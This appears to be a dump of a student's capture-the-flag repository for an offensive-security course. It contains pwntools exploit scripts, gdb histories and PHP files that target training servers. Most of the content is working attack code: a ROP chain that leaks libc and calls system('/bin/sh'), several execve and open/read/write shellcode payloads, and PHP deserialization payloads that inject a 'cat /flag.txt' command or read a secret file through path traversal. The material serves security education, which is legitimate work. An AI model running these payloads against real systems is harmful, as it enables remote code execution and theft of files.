https://raw.githubusercontent.com/Vechus/ODC-challenges/6c7a50f9fd4c9d575bdf4ae09eaf4b0449403973/rop/positiveleak/libc-2.27.so -------------------------------------------------------------------------------- /rop/positiveleak/positiveleak: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Vechus/ODC-challenges/6c7a50f9fd4c9d575bdf4ae09eaf4b0449403973/rop/positiveleak/positiveleak -------------------------------------------------------------------------------- /rop/ropasaurusrex/.gdb_history: -------------------------------------------------------------------------------- 1 | c 2 | q 3 | c 4 | q 5 | c 6 | x/20x $esp+0x34 7 | got 8 | q 9 | c 10 | vmmap 11 | q 12 | c 13 | vmmap 14 | q 15 | c 16 | q 17 | got 18 | plt 19 | q 20 | c 21 | q 22 | c 23 | q 24 | c 25 | q 26 | c 27 | vmmap 28 | q 29 | c 30 | q 31 | c 32 | q 33 | c 34 | vmmap 35 | q 36 | c 37 | q 38 | q 39 | c 40 | q 41 | c 42 | q 43 | c 44 | q 45 | c 46 | q 47 | -------------------------------------------------------------------------------- /rop/ropasaurusrex/core: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Vechus/ODC-challenges/6c7a50f9fd4c9d575bdf4ae09eaf4b0449403973/rop/ropasaurusrex/core -------------------------------------------------------------------------------- /rop/ropasaurusrex/exploit.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # -*- coding: utf-8 -*- 3 | # This exploit template was generated via: 4 | # $ pwn template --host training.jinblack.it --port 2014 ropasaurusrex 5 | from pwn import * 6 | 7 | # Set up pwntools for the correct architecture 8 | exe = context.binary = ELF('./ropasaurusrex') 9 | 10 | # Many built-in settings can be controlled on the command-line and show up 11 | # in "args". For example, to dump all data sent/received, and disable ASLR 12 | # for all created processes... 13 | # ./exploit.py DEBUG NOASLR 14 | # ./exploit.py GDB HOST=example.com PORT=4141 15 | host = args.HOST or 'training.jinblack.it' 16 | port = int(args.PORT or 2014) 17 | 18 | def start_local(argv=[], *a, **kw): 19 | '''Execute the target binary locally''' 20 | if args.GDB: 21 | return gdb.debug([exe.path] + argv, gdbscript=gdbscript, *a, **kw) 22 | else: 23 | return process([exe.path] + argv, *a, **kw) 24 | 25 | def start_remote(argv=[], *a, **kw): 26 | '''Connect to the process on the remote host''' 27 | io = connect(host, port) 28 | if args.GDB: 29 | gdb.attach(io, gdbscript=gdbscript) 30 | return io 31 | 32 | def start(argv=[], *a, **kw): 33 | '''Start the exploit against the target.''' 34 | if args.LOCAL: 35 | return start_local(argv, *a, **kw) 36 | else: 37 | return start_remote(argv, *a, **kw) 38 | 39 | # Specify your GDB script here for debugging 40 | # GDB will be launched if the exploit is run via e.g. 41 | # ./exploit.py GDB 42 | gdbscript = ''' 43 | tbreak *0x{exe.entry:x} 44 | continue 45 | '''.format(**locals()) 46 | 47 | #=========================================================== 48 | # EXPLOIT GOES HERE 49 | #=========================================================== 50 | # Arch: i386-32-little 51 | # RELRO: No RELRO 52 | # Stack: No canary found 53 | # NX: NX enabled 54 | # PIE: No PIE (0x8048000) 55 | 56 | libc = ELF('./libc-2.27.so') 57 | 58 | eip_loc = 140 59 | one_gadget = 0x3d0d3 60 | 61 | write_plt = exe.plt['write'] 62 | write_got = exe.got['write'] 63 | 64 | rop_chain = p32(write_plt) + p32(0x080483f4) + p32(0x1) + p32(write_got) + p32(0x4) 65 | 66 | io = start() 67 | 68 | io.send(cyclic(140) + rop_chain) 69 | 70 | libc.address = u32(io.recv(4)) - libc.symbols['write'] 71 | 72 | if args.LOCAL: 73 | libc.address -= 0xb0 74 | 75 | 76 | 77 | log.info('0x%x' % libc.address) 78 | 79 | bin_sh = next(libc.search(b'/bin/sh\0')) 80 | 81 | io.send(cyclic(140) + p32(libc.symbols['system']) + p32(0xdeadbeef) + p32(bin_sh)) 82 | 83 | io.interactive() 84 | 85 | -------------------------------------------------------------------------------- /rop/ropasaurusrex/libc-2.27.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Vechus/ODC-challenges/6c7a50f9fd4c9d575bdf4ae09eaf4b0449403973/rop/ropasaurusrex/libc-2.27.so -------------------------------------------------------------------------------- /rop/ropasaurusrex/ropasaurusrex: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Vechus/ODC-challenges/6c7a50f9fd4c9d575bdf4ae09eaf4b0449403973/rop/ropasaurusrex/ropasaurusrex -------------------------------------------------------------------------------- /serialization/free_as_in_beer/exploit.py: -------------------------------------------------------------------------------- 1 | import requests 2 | 3 | url = 'http://free.training.jinblack.it/' 4 | 5 | cookie = {'todos': '760463360e4919ca238d1566fc26661fa:1:{i:0%3bO:16:"GPLSourceBloater":1:{' 6 | 's:6:"source"%3bs:8:"flag.php"%3b}}'} 7 | 8 | r = requests.get(url, cookies=cookie) 9 | 10 | # the flag is in here 11 | print(r.text) 12 | -------------------------------------------------------------------------------- /serialization/lolshop/code.php: -------------------------------------------------------------------------------- 1 | id = $id; 13 | $this->name = $name; 14 | $this->description = $description; 15 | $this->picture = $picture; 16 | $this->price = $price; 17 | } 18 | 19 | function getId() { 20 | return $this->id; 21 | } 22 | 23 | function getName() { 24 | return $this->name; 25 | } 26 | 27 | function getDescription() { 28 | return $this->description; 29 | } 30 | 31 | function getPicture() { 32 | $path = '/var/www/assets/' . $this->picture; 33 | $data = base64_encode(file_get_contents($path)); 34 | return $data; 35 | } 36 | 37 | function getPrice() { 38 | return $this->price; 39 | } 40 | 41 | function toDict() { 42 | return array( 43 | "id" => $this->id, 44 | "name" => $this->name, 45 | "description" => $this->description, 46 | "picture" => $this->getPicture(), 47 | "price" => $this->price 48 | ); 49 | } 50 | 51 | } 52 | 53 | $prod = new Product(10, "chad", "can you feel my heart", "../../../secret/flag.txt", 10); 54 | echo base64_encode(gzcompress(serialize($prod))); 55 | ?> -------------------------------------------------------------------------------- /serialization/lolshop/exploit.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import os 3 | import base64 4 | import json 5 | 6 | # at this url, it echoes back the state 7 | url = 'http://jinblack.it:3006/api/cart.php' 8 | php_path = 'code.php' 9 | 10 | out = os.popen('php ' + php_path).read() 11 | 12 | state = {'state': out} 13 | 14 | r = json.loads(requests.post(url, data=state).text) 15 | 16 | # base64decode picture and that's it! 17 | print(base64.b64decode(r['picture']).decode()) 18 | -------------------------------------------------------------------------------- /serialization/metactf/code.php: -------------------------------------------------------------------------------- 1 | name = $name; 12 | $this->description = $description; 13 | } 14 | 15 | function start(){ 16 | if(!is_null($this->setup_cmd)){ 17 | $output=null; 18 | $retval=null; 19 | echo("Starting challenge!"); 20 | exec($this->setup_cmp, $output, $retval); 21 | echo($output[0]); 22 | } 23 | } 24 | 25 | function stop(){ 26 | if(!is_null($this->stop_cmd)){ 27 | $output=null; 28 | $retval=null; 29 | echo("Stoping challenge!"); 30 | exec($this->stop_cmd, $output, $retval); 31 | echo($output[0]); 32 | } 33 | } 34 | 35 | 36 | function __destruct(){ 37 | $this->stop(); 38 | } 39 | 40 | } 41 | 42 | $chall = new Challenge("Vechus", "vez-chall"); 43 | $chall->stop_cmd = "cat /flag.txt"; 44 | $s = serialize($chall); 45 | 46 | echo $s; -------------------------------------------------------------------------------- /serialization/metactf/exploit.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import os 3 | import base64 4 | import json 5 | 6 | # at this url, it echoes back the state 7 | url = 'http://meta.training.jinblack.it/upload_user.php' 8 | php_path = 'code.php' 9 | 10 | out = os.popen('php ' + php_path).read() 11 | 12 | with open('upload', 'w') as f: 13 | f.write(out) 14 | f.close() 15 | -------------------------------------------------------------------------------- /serialization/metactf/upload: -------------------------------------------------------------------------------- 1 | O:9:"Challenge":4:{s:4:"name";s:6:"Vechus";s:11:"description";s:9:"vez-chall";s:9:"setup_cmd";N;s:8:"stop_cmd";s:13:"cat /flag.txt";} -------------------------------------------------------------------------------- /shellcode/backtoshell/backtoshell: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Vechus/ODC-challenges/6c7a50f9fd4c9d575bdf4ae09eaf4b0449403973/shellcode/backtoshell/backtoshell -------------------------------------------------------------------------------- /shellcode/backtoshell/exploit.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | context.terminal = ['gnome-terminal', '-e'] 4 | context.arch = 'amd64' 5 | 6 | 7 | shell = '\x48\x31\xf6\x56\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x54\x5f\x6a\x3b\x58\x99\x0f\x05' 8 | 9 | sh = b'\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05' 10 | 11 | #r = process('backtoshell') 12 | r = remote('training.jinblack.it', 3001) 13 | 14 | payload = asm('mov rsp, rax') 15 | payload += asm('add rsp, 32') 16 | payload += b'\x90' * 32 17 | payload += sh 18 | 19 | if args.ATTACH: 20 | gdb.attach(r, ''' 21 | b *0x401144 22 | c 23 | ''') 24 | 25 | input('wait gdb') 26 | 27 | r.sendline(payload) 28 | 29 | r.interactive() 30 | 31 | #print(shell) 32 | -------------------------------------------------------------------------------- /shellcode/gimme3bytes/.gdb_history: -------------------------------------------------------------------------------- 1 | q 2 | c 3 | disass 4 | disass main 5 | b *0x00000000004011f1 6 | b *0x00000000004011f1 7 | c 8 | ni 9 | c 10 | q 11 | ni 12 | disass main 13 | status 14 | si 15 | disass main 16 | showq 17 | q 18 | c 19 | q 20 | b *0x00000000004011f1 21 | c 22 | ni 23 | b *0x00000000004011f1 24 | c 25 | si 26 | ni 27 | si 28 | si 29 | q 30 | b *0x00000000004011f1 31 | c 32 | si 33 | ni 34 | ni 35 | q 36 | b *0x00000000004011f1 37 | c 38 | si 39 | ni 40 | ni 41 | q 42 | c 43 | si 44 | q 45 | c 46 | si 47 | q 48 | c 49 | q 50 | disass main 51 | b *0x4011e3 52 | c 53 | si 54 | ni 55 | si 56 | ni 57 | si 58 | q 59 | c 60 | si 61 | c 62 | q 63 | c 64 | si 65 | q 66 | c 67 | si 68 | c 69 | -------------------------------------------------------------------------------- /shellcode/gimme3bytes/exploit.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # -*- coding: utf-8 -*- 3 | # This exploit template was generated via: 4 | # $ pwn template --host training.jinblack.it --port 2004 gimme3bytes 5 | from pwn import * 6 | 7 | # Set up pwntools for the correct architecture 8 | exe = context.binary = ELF('gimme3bytes') 9 | 10 | # Many built-in settings can be controlled on the command-line and show up 11 | # in "args". For example, to dump all data sent/received, and disable ASLR 12 | # for all created processes... 13 | # ./exploit.py DEBUG NOASLR 14 | # ./exploit.py GDB HOST=example.com PORT=4141 15 | host = args.HOST or 'training.jinblack.it' 16 | port = int(args.PORT or 2004) 17 | 18 | def start_local(argv=[], *a, **kw): 19 | '''Execute the target binary locally''' 20 | if args.GDB: 21 | return gdb.debug([exe.path] + argv, gdbscript=gdbscript, *a, **kw) 22 | else: 23 | return process([exe.path] + argv, *a, **kw) 24 | 25 | def start_remote(argv=[], *a, **kw): 26 | '''Connect to the process on the remote host''' 27 | io = connect(host, port) 28 | if args.GDB: 29 | gdb.attach(io, gdbscript=gdbscript) 30 | return io 31 | 32 | def start(argv=[], *a, **kw): 33 | '''Start the exploit against the target.''' 34 | if args.LOCAL: 35 | return start_local(argv, *a, **kw) 36 | else: 37 | return start_remote(argv, *a, **kw) 38 | 39 | # Specify your GDB script here for debugging 40 | # GDB will be launched if the exploit is run via e.g. 41 | # ./exploit.py GDB 42 | gdbscript = ''' 43 | tbreak main 44 | break *0x00000000004011f1 45 | continue 46 | '''.format(**locals()) 47 | 48 | #=========================================================== 49 | # EXPLOIT GOES HERE 50 | #=========================================================== 51 | # Arch: amd64-64-little 52 | # RELRO: Partial RELRO 53 | # Stack: No canary found 54 | # NX: NX disabled 55 | # PIE: No PIE (0x400000) 56 | # RWX: Has RWX segments 57 | 58 | ''' 59 | pop rdx 60 | syscall 61 | ''' 62 | syscall = b'\x5a\x0f\x05' 63 | sh = b'\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05' 64 | 65 | io = start() 66 | 67 | io.send(syscall) 68 | io.send(b'\x90' * 4 + sh) 69 | 70 | io.interactive() 71 | 72 | -------------------------------------------------------------------------------- /shellcode/gimme3bytes/gimme3bytes: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Vechus/ODC-challenges/6c7a50f9fd4c9d575bdf4ae09eaf4b0449403973/shellcode/gimme3bytes/gimme3bytes -------------------------------------------------------------------------------- /shellcode/multistage/.gdb_history: -------------------------------------------------------------------------------- 1 | attach 2 | attach 8149 3 | break *0x004011d8 4 | c 5 | ni 6 | c 7 | attach 8240 8 | ni 9 | attach 8455 10 | ni 11 | si 12 | ni 13 | ni 14 | attach 8636 15 | ni 16 | p/x $rsp 17 | p/x *$rsp 18 | p/x $rsp 19 | x/x $rsp 20 | attach 9318 21 | ni 22 | attach 9805 23 | ni 24 | attach 10237 25 | break *0x0040117d 26 | ni 27 | attach 10267 28 | break *0x00401178 29 | attach 10301 30 | break *0x00401178 31 | ni 32 | attach 10327 33 | break *0x00401173 34 | ni 35 | c 36 | info b 37 | break get_name 38 | attach 10379 39 | info b 40 | ni 41 | q 42 | info b 43 | b get_nae 44 | b get_name 45 | c 46 | r 47 | attach 10533 48 | q 49 | attach 10817 50 | ni 51 | attach 11297 52 | ni 53 | vmmap 0x404070 54 | disass main 55 | b *0x000000000040122c 56 | r 57 | vmmap 0x404070 58 | q 59 | -------------------------------------------------------------------------------- /shellcode/multistage/exploit.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # -*- coding: utf-8 -*- 3 | # This exploit template was generated via: 4 | # $ pwn template --host training.jinblack.it --port 2001 shellcode 5 | from pwn import * 6 | 7 | # Set up pwntools for the correct architecture 8 | exe = context.binary = ELF('multistage') 9 | 10 | # Many built-in settings can be controlled on the command-line and show up 11 | # in "args". For example, to dump all data sent/received, and disable ASLR 12 | # for all created processes... 13 | # ./exploit.py DEBUG NOASLR 14 | # ./exploit.py GDB HOST=example.com PORT=4141 15 | host = args.HOST or 'training.jinblack.it' 16 | port = int(args.PORT or 2003) 17 | 18 | def start_local(argv=[], *a, **kw): 19 | '''Execute the target binary locally''' 20 | if args.GDB: 21 | return gdb.debug([exe.path] + argv, gdbscript=gdbscript, *a, **kw) 22 | else: 23 | return process([exe.path] + argv, *a, **kw) 24 | 25 | def start_remote(argv=[], *a, **kw): 26 | '''Connect to the process on the remote host''' 27 | io = connect(host, port) 28 | if args.GDB: 29 | gdb.attach(io, gdbscript=gdbscript) 30 | return io 31 | 32 | def start(argv=[], *a, **kw): 33 | '''Start the exploit against the target.''' 34 | if args.LOCAL: 35 | return start_local(argv, *a, **kw) 36 | else: 37 | return start_remote(argv, *a, **kw) 38 | 39 | # Specify your GDB script here for debugging 40 | # GDB will be launched if the exploit is run via e.g. 41 | # ./exploit.py GDB 42 | gdbscript = ''' 43 | tbreak main 44 | break *0x004011d8 45 | continue 46 | '''.format(**locals()) 47 | 48 | #=========================================================== 49 | # EXPLOIT GOES HERE 50 | #=========================================================== 51 | # Arch: amd64-64-little 52 | # RELRO: Partial RELRO 53 | # Stack: No canary found 54 | # NX: NX disabled 55 | # PIE: No PIE (0x400000) 56 | # RWX: Has RWX segments 57 | 58 | ''' 59 | mov rsi, 0x404084 ; 0x404070 + 0x14 60 | xor rdi, rdi 61 | xor rax, rax 62 | add rdx, 0x60 63 | syscall 64 | ''' 65 | step_one = b'\x48\xC7\xC6\x84\x40\x40\x00\x48\x31\xFF\x48\x31\xC0\x48\x83\xC2\x60\x0F\x05\x90' 66 | 67 | print('step one len=',len(step_one)) # 19 68 | 69 | sh = b'\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05' 70 | 71 | io = start() 72 | 73 | io.send(step_one) 74 | sleep(1) 75 | io.sendline(sh) 76 | 77 | io.interactive() -------------------------------------------------------------------------------- /shellcode/multistage/multistage: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Vechus/ODC-challenges/6c7a50f9fd4c9d575bdf4ae09eaf4b0449403973/shellcode/multistage/multistage -------------------------------------------------------------------------------- /shellcode/onlyreadwrite/.gdb_history: -------------------------------------------------------------------------------- 1 | r 2 | q 3 | b prog 4 | r 5 | c 6 | ni 7 | c 8 | q 9 | -------------------------------------------------------------------------------- /shellcode/onlyreadwrite/exploit.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # -*- coding: utf-8 -*- 3 | # This exploit template was generated via: 4 | # $ pwn template --host training.jinblack.it --port 2006 shellcode 5 | from pwn import * 6 | 7 | # Set up pwntools for the correct architecture 8 | exe = context.binary = ELF('shellcode') 9 | 10 | # Many built-in settings can be controlled on the command-line and show up 11 | # in "args". For example, to dump all data sent/received, and disable ASLR 12 | # for all created processes... 13 | # ./exploit.py DEBUG NOASLR 14 | # ./exploit.py GDB HOST=example.com PORT=4141 15 | host = args.HOST or 'training.jinblack.it' 16 | port = int(args.PORT or 2006) 17 | 18 | def start_local(argv=[], *a, **kw): 19 | '''Execute the target binary locally''' 20 | if args.GDB: 21 | return gdb.debug([exe.path] + argv, gdbscript=gdbscript, *a, **kw) 22 | else: 23 | return process([exe.path] + argv, *a, **kw) 24 | 25 | def start_remote(argv=[], *a, **kw): 26 | '''Connect to the process on the remote host''' 27 | io = connect(host, port) 28 | if args.GDB: 29 | gdb.attach(io, gdbscript=gdbscript) 30 | return io 31 | 32 | def start(argv=[], *a, **kw): 33 | '''Start the exploit against the target.''' 34 | if args.LOCAL: 35 | return start_local(argv, *a, **kw) 36 | else: 37 | return start_remote(argv, *a, **kw) 38 | 39 | # Specify your GDB script here for debugging 40 | # GDB will be launched if the exploit is run via e.g. 41 | # ./exploit.py GDB 42 | gdbscript = ''' 43 | tbreak main 44 | continue 45 | '''.format(**locals()) 46 | 47 | #=========================================================== 48 | # EXPLOIT GOES HERE 49 | #=========================================================== 50 | # Arch: amd64-64-little 51 | # RELRO: Partial RELRO 52 | # Stack: No canary found 53 | # NX: NX disabled 54 | # PIE: No PIE (0x400000) 55 | # RWX: Has RWX segments 56 | 57 | ''' 58 | f = open("flag", 0, 0); // return a file descriptor 59 | read(f, buffer + something, 50); // read flag content 60 | write(socket_fd, buffer+something, 50); // write to our socket 61 | ''' 62 | code = 'push 0x1\n' # push the stdout fd 63 | code += 'push 0x67616c66\n' # 'flag' 64 | code += 'mov rdi, rsp\n' # rdi = rsp = address of 'flag' 65 | code += 'xor rsi, rsi\n' # reset rsi and rdx 66 | code += 'xor rdx, rdx\n' 67 | code += 'mov rax, 0x2\n' # syscall 2 68 | code += 'syscall\n' # puts f in rax 69 | code += 'pop rbx\n' # because i want a tidy stack :) 70 | code += 'mov rdi, rax\n' # put f in rdi 71 | code += 'mov rsi, rsp\n' # let's write on the stack 72 | code += 'add rsi, 0xb\n' 73 | code += 'mov rdx, 0xf0\n' # read 0xf0 charsalcalc 74 | code += 'mov rax, 0x0\n' 75 | code += 'syscall\n' # read, puts content in rsi 76 | code += 'pop rdi\n' # rdi = socket_fd 77 | code += 'mov rax, 0x01\n' 78 | code += 'syscall\n' # GOTCHA 79 | 80 | sh = asm(code) 81 | 82 | point = 1016 83 | displace = b'\x90' * 8 84 | buffer_addr = p64(0x4040c0) 85 | 86 | print('shellcode len=', len(sh)) 87 | 88 | io = start() 89 | io.send(displace + sh + b'\x90' * (point - len(sh) - 16) + displace + buffer_addr + b'\x90' * 8) 90 | #io.sendline(b'cat flag') 91 | 92 | io.interactive() 93 | 94 | -------------------------------------------------------------------------------- /shellcode/onlyreadwrite/flag: -------------------------------------------------------------------------------- 1 | CONGRATS 2 | -------------------------------------------------------------------------------- /shellcode/onlyreadwrite/shellcode: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Vechus/ODC-challenges/6c7a50f9fd4c9d575bdf4ae09eaf4b0449403973/shellcode/onlyreadwrite/shellcode -------------------------------------------------------------------------------- /shellcode/server/.gdb_history: -------------------------------------------------------------------------------- 1 | b *00401231 2 | b *0x0401231 3 | c 4 | r 5 | c 6 | delete 7 | b *0x0401231 8 | c 9 | q 10 | b *0x0040130d 11 | r 12 | q 13 | q 14 | attach 19773 15 | q 16 | attach 19773 17 | break *0x0040130d 18 | c 19 | c 20 | c 21 | c 22 | c 23 | c 24 | c 25 | c 26 | c 27 | c 28 | c 29 | c 30 | q 31 | attach 19773 32 | break *0x0040130d 33 | c 34 | cyclic -l 0040130d 35 | cyclic -l eaak 36 | c 37 | c 38 | attach 19773 39 | c 40 | attach 19773 41 | c 42 | ni 43 | attach 19773 44 | c 45 | ni 46 | attach 19773 47 | c 48 | ni 49 | attach 19773 50 | c 51 | ni 52 | attach 19773 53 | c 54 | ni 55 | attach 19773 56 | c 57 | ni 58 | attach 19773 59 | c 60 | ni 61 | attach 19773 62 | c 63 | ni 64 | attach 19773 65 | c 66 | ni 67 | attach 19773 68 | c 69 | ni 70 | attach 19773 71 | c 72 | ni 73 | c 74 | c 75 | c 76 | attach 19773 77 | c 78 | ni 79 | ps 80 | ps -a 81 | ps -a 82 | c 83 | attach 19773 84 | c 85 | c 86 | dash 87 | which sh 88 | which shell 89 | which bash 90 | ps -a 91 | ps -a 92 | attach 20292 93 | ps -a 94 | q 95 | attach 20569 96 | c 97 | ni 98 | ni 99 | c 100 | c 101 | r 102 | r 103 | b *0x004013c6 104 | r 105 | ni 106 | ni 107 | si 108 | ni 109 | si 110 | ni 111 | so 112 | ni 113 | si 114 | c 115 | r 116 | c 117 | e 118 | r 119 | c 120 | q 121 | b *0x0040130d 122 | c 123 | r 124 | q 125 | b *0x0040130d 126 | disass prog 127 | c 128 | r 129 | disass prog 130 | b *0x00000000004012b4 131 | r 132 | r 133 | info b 134 | r 135 | disass main 136 | b *0x00000000004013d0 137 | r 138 | q 139 | b *0x00000000004013d0 140 | r 141 | info b 142 | ni 143 | q 144 | b prog 145 | r 146 | q 147 | b prog 148 | r 149 | q 150 | b prog 151 | r 152 | ni 153 | c 154 | c 155 | c 156 | c 157 | r 158 | q 159 | b prog 160 | r 161 | q 162 | b prog 163 | r 164 | q 165 | b prog 166 | r 167 | ni 168 | c 169 | c 170 | r 171 | q 172 | b prog 173 | c 174 | r 175 | q 176 | c 177 | b prog 178 | r 179 | q 180 | b prog 181 | r 182 | ni 183 | c 184 | q 185 | b prog 186 | r 187 | r 188 | r 189 | r 190 | q 191 | b prog 192 | r 193 | q 194 | b prog 195 | r 196 | ni 197 | r 198 | q 199 | b prog 200 | r 201 | q 202 | b prog 203 | r 204 | q 205 | b prog 206 | r 207 | q 208 | b prog 209 | r 210 | ni 211 | q 212 | b prog 213 | r 214 | ni 215 | q 216 | -------------------------------------------------------------------------------- /shellcode/server/exploit.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # -*- coding: utf-8 -*- 3 | # This exploit template was generated via: 4 | # $ pwn template --host training.jinblack.it --port 2005 server 5 | from pwn import * 6 | 7 | # Set up pwntools for the correct architecture 8 | exe = context.binary = ELF('server') 9 | 10 | # Many built-in settings can be controlled on the command-line and show up 11 | # in "args". For example, to dump all data sent/received, and disable ASLR 12 | # for all created processes... 13 | # ./exploit.py DEBUG NOASLR 14 | # ./exploit.py GDB HOST=example.com PORT=4141 15 | host = args.HOST or 'training.jinblack.it' 16 | port = int(args.PORT or 2005) 17 | 18 | def start_local(argv=[], *a, **kw): 19 | '''Execute the target binary locally''' 20 | if args.GDB: 21 | return gdb.debug([exe.path] + argv, gdbscript=gdbscript, *a, **kw) 22 | else: 23 | return process([exe.path] + argv, *a, **kw) 24 | 25 | def start_remote(argv=[], *a, **kw): 26 | '''Connect to the process on the remote host''' 27 | io = connect(host, port) 28 | if args.GDB: 29 | gdb.attach(io, gdbscript=gdbscript) 30 | return io 31 | 32 | def start(argv=[], *a, **kw): 33 | '''Start the exploit against the target.''' 34 | if args.LOCAL: 35 | return start_local(argv, *a, **kw) 36 | else: 37 | return start_remote(argv, *a, **kw) 38 | 39 | # Specify your GDB script here for debugging 40 | # GDB will be launched if the exploit is run via e.g. 41 | # ./exploit.py GDB 42 | gdbscript = ''' 43 | tbreak main 44 | continue 45 | '''.format(**locals()) 46 | 47 | #=========================================================== 48 | # EXPLOIT GOES HERE 49 | #=========================================================== 50 | # Arch: amd64-64-little 51 | # RELRO: Partial RELRO 52 | # Stack: No canary found 53 | # NX: NX disabled 54 | # PIE: No PIE (0x400000) 55 | # RWX: Has RWX segments 56 | 57 | point = 1016 58 | buffer_addr = p64(0x004040c0) 59 | displace = b'\x90' * 8 60 | 61 | # in rdi there is the file descriptor or the socket! 62 | ''' 63 | f = open("flag", 0, 0); // return a file descriptor 64 | read(f, buffer + something, 50); // read flag content 65 | write(socket_fd, buffer+something, 50); // write to our socket 66 | ''' 67 | code = 'push rdi\n' # push the socket file descriptor 68 | code += 'push 0x67616c66\n' # 'flag' 69 | code += 'mov rdi, rsp\n' # rdi = rsp = address of 'flag' 70 | code += 'xor rsi, rsi\n' # reset rsi and rdx 71 | code += 'xor rdx, rdx\n' 72 | code += 'mov rax, 0x2\n' # syscall 2 73 | code += 'syscall\n' # puts f in rax 74 | code += 'pop rbx\n' # because i want a tidy stack :) 75 | code += 'mov rdi, rax\n' # put f in rdi 76 | code += 'mov rsi, rsp\n' # let's write on the stack 77 | code += 'add rsi, 0xb\n' 78 | code += 'mov rdx, 0xf0\n' # read 0xf0 charsalcalc 79 | code += 'mov rax, 0x0\n' 80 | code += 'syscall\n' # read, puts content in rsi 81 | code += 'pop rdi\n' # rdi = socket_fd 82 | code += 'mov rax, 0x01\n' 83 | code += 'syscall\n' # GOTCHA 84 | 85 | sh = asm(code) 86 | 87 | print('shellcode len=', len(sh)) 88 | 89 | io = start() 90 | io.send(displace + sh + b'\x90' * (point - len(sh) - 16) + displace + buffer_addr + b'\x90' * 8) 91 | #io.sendline(b'cat flag') 92 | 93 | io.interactive() 94 | 95 | -------------------------------------------------------------------------------- /shellcode/server/flag: -------------------------------------------------------------------------------- 1 | CONGRATS LOL! 2 | -------------------------------------------------------------------------------- /shellcode/server/server: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Vechus/ODC-challenges/6c7a50f9fd4c9d575bdf4ae09eaf4b0449403973/shellcode/server/server -------------------------------------------------------------------------------- /shellcode/sh3llc0d3/.gdb_history: -------------------------------------------------------------------------------- 1 | b *0x0804928c 2 | r 3 | cyclic -l daac 4 | q 5 | info b 6 | r 7 | q 8 | q 9 | info b 10 | r 11 | c 12 | q 13 | cyclic 1000 14 | r 15 | cyclic -l daac 16 | q 17 | c 18 | q 19 | c 20 | q 21 | c 22 | c 23 | ni 24 | q 25 | disassemble main 26 | disassemble prog 27 | b 0x0804928c 28 | b *0x0804928c 29 | q 30 | c 31 | q 32 | ni 33 | q 34 | q 35 | q 36 | -------------------------------------------------------------------------------- /shellcode/sh3llc0d3/exploit.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # -*- coding: utf-8 -*- 3 | # This exploit template was generated via: 4 | # $ pwn template --host training.jinblack.it --port 2002 sh3llc0d3 5 | from pwn import * 6 | 7 | # Set up pwntools for the correct architecture 8 | exe = context.binary = ELF('sh3llc0d3') 9 | 10 | # Many built-in settings can be controlled on the command-line and show up 11 | # in "args". For example, to dump all data sent/received, and disable ASLR 12 | # for all created processes... 13 | # ./exploit.py DEBUG NOASLR 14 | # ./exploit.py GDB HOST=example.com PORT=4141 15 | host = args.HOST or 'training.jinblack.it' 16 | port = int(args.PORT or 2002) 17 | 18 | def start_local(argv=[], *a, **kw): 19 | '''Execute the target binary locally''' 20 | if args.GDB: 21 | return gdb.debug([exe.path] + argv, gdbscript=gdbscript, *a, **kw) 22 | else: 23 | return process([exe.path] + argv, *a, **kw) 24 | 25 | def start_remote(argv=[], *a, **kw): 26 | '''Connect to the process on the remote host''' 27 | io = connect(host, port) 28 | if args.GDB: 29 | gdb.attach(io, gdbscript=gdbscript) 30 | return io 31 | 32 | def start(argv=[], *a, **kw): 33 | '''Start the exploit against the target.''' 34 | if args.LOCAL: 35 | return start_local(argv, *a, **kw) 36 | else: 37 | return start_remote(argv, *a, **kw) 38 | 39 | # Specify your GDB script here for debugging 40 | # GDB will be launched if the exploit is run via e.g. 41 | # ./exploit.py GDB 42 | gdbscript = ''' 43 | break *0x0804928c 44 | continue 45 | '''.format(**locals()) 46 | 47 | #=========================================================== 48 | # EXPLOIT GOES HERE 49 | #=========================================================== 50 | # Arch: i386-32-little 51 | # RELRO: Partial RELRO 52 | # Stack: No canary found 53 | # NX: NX disabled 54 | # PIE: No PIE (0x8048000) 55 | # RWX: Has RWX segments 56 | 57 | point = 212 58 | buffer_addr = p32(0x0804c060) 59 | displace = b'\x90' * 8 * 0 60 | 61 | sh = b'\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80' 62 | 63 | payload = displace 64 | payload += sh 65 | payload += b'\x90' * (point - len(sh) - len(displace)) 66 | payload += buffer_addr 67 | payload += b'\x90' * 784 68 | print(len(payload)) 69 | input() 70 | 71 | io = start() 72 | 73 | 74 | io.sendline(payload) 75 | 76 | io.interactive() 77 | 78 | -------------------------------------------------------------------------------- /shellcode/sh3llc0d3/sh3llc0d3: -------------------------------------------------------------------------------- 